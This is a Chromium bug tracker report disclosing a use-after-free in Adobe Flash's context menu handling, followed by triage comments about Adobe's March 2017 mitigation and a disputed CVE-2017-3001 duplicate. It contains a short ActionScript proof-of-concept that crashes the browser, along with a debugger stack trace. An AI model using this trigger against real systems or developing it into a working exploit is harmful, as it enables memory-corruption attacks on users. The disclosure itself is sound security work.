Issue metadata
Sign in to add a comment
|
Security: Adobe Flash Context Menu Use After Free
Reported by
xiong12...@gmail.com,
Dec 23 2016
|
||||||||||||||||||||||
Issue description
VULNERABILITY DETAILS
Adobe Flash Context Menu Use After Free
VERSION
Chrome Version: 56.0.2924.28 beta (64-bit)
Operating System: Windows 7 en 64-bit
REPRODUCTION CASE
Open "TestContextMenu.html" with chrome.
Right-click the mouse, then observe chrome crash.
This is a use after free bug when using context menu in flash.
When we set MovieClip.menu, the menu parameter will be converted to object.
If the menu is not an object, we can trig a user-defined callback function.
If we remove the MovieClip in the callback, a use-after-free occurs.
var mc = this.createEmptyMovieClip("mc", 0);
_global["Number"] = function() {
trace(123);
_root.removeMovieClip.call(mc);
this.onSelect = function(){
trace(233);
}
}
mc.menu = 111;
_root.addProperty('_level0',function(){
trace(1);
return mc;
}, function(){});
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Crash State:
(1774.1444): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00000000`00000000 ?? ???
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Users\yuki\AppData\Local\Google\Chrome\User Data\PepperFlash\24.0.0.186\pepflashplayer.dll -
8:097> k
Child-SP RetAddr Call Site
00000000`0013e068 000007fe`d6208f20 0x0
00000000`0013e070 000007fe`d62e27f5 pepflashplayer!PPP_ShutdownBroker+0x204790
00000000`0013e0a0 000007fe`d6204d7e pepflashplayer!PPP_ShutdownBroker+0x2de065
00000000`0013e0d0 000007fe`d621638a pepflashplayer!PPP_ShutdownBroker+0x2005ee
00000000`0013e200 000007fe`d6015e05 pepflashplayer!PPP_ShutdownBroker+0x211bfa
00000000`0013e300 000007fe`d60142a4 pepflashplayer!PPP_ShutdownBroker+0x11675
00000000`0013e340 000007fe`d6019176 pepflashplayer!PPP_ShutdownBroker+0xfb14
00000000`0013e5f0 000007fe`d601942f pepflashplayer!PPP_ShutdownBroker+0x149e6
00000000`0013e660 000007fe`d60196dc pepflashplayer!PPP_ShutdownBroker+0x14c9f
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.28\chrome_child.dll -
00000000`0013e690 000007fe`d97c7950 pepflashplayer!PPP_ShutdownBroker+0x14f4c
00000000`0013e6c0 000007fe`d97c7ce1 chrome_child!IsSandboxedProcess+0x20970
00000000`0013e6f0 000007fe`d97c7ebe chrome_child!IsSandboxedProcess+0x20d01
00000000`0013e790 000007fe`d97af728 chrome_child!IsSandboxedProcess+0x20ede
00000000`0013e7e0 000007fe`d97afff6 chrome_child!IsSandboxedProcess+0x8748
00000000`0013e810 000007fe`d7f450c0 chrome_child!IsSandboxedProcess+0x9016
00000000`0013e840 000007fe`d7f4503e chrome_child!ovly_debug_event+0x157d0
00000000`0013e870 000007fe`d7f47094 chrome_child!ovly_debug_event+0x1574e
00000000`0013e970 000007fe`d7f459ef chrome_child!ovly_debug_event+0x177a4
00000000`0013ea90 000007fe`d7f44a89 chrome_child!ovly_debug_event+0x160ff
00000000`0013ee80 000007fe`d8330f37 chrome_child!ovly_debug_event+0x15199
Credit:
Please credit "Yuki Chen of Qihoo 360 Vulcan Team" for this bug.
,
Dec 24 2016
,
Dec 24 2016
,
Dec 24 2016
,
Jan 26 2017
,
Feb 13 2017
,
Feb 15 2017
Hello, Has this one been reported to Adobe? Thank you!
,
Feb 15 2017
This is PSIRT-6397
,
Mar 10 2017
,
Apr 10 2017
According to Adobe, this is also CVE-2017-3001
,
Apr 11 2017
They are apparently different vulnerabilities. Disappointed in adobe security.
,
Apr 11 2017
Can you provide more details? If you feel they are different, I can take it up with Adobe. Was it fixed in the March update like they say?
,
Apr 11 2017
@natalie Really appreciate your help. I attached one of the vulnerabilities which they said is "cve-2017-3001". This is a use after free caused by AS2 delete2 action. we need to manually modify the byte code to trig this uaf. And this bug, the context menu uaf, is a uaf when converting the context menu to object. The too bugs are in different modules, caused by different callbacks. It seems adobe disables the destructor function call of AS2 MovieClip objects in the March update. So all MovieClip uafs will not crash any more in this version. I guess they even hadn't carefully looked into the details of these issues, just tested them on this version, saw on crashes any more, and said they are duplicate bugs.
,
Apr 11 2017
Does removing the destructor from Movie Clip fix this issue? Or does it just cause it not to crash?
,
Apr 11 2017
Yes, this issue is fixed by the mitigation. Actually, all UAFs in AS2 MoieClip object are fixed by this mitigation.
,
Apr 11 2017
,
Feb 16 2018
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||
Comment 1 by aarya@google.com
, Dec 24 2016Owner: natashenka@google.com
Status: ExternalDependency (was: Unconfirmed)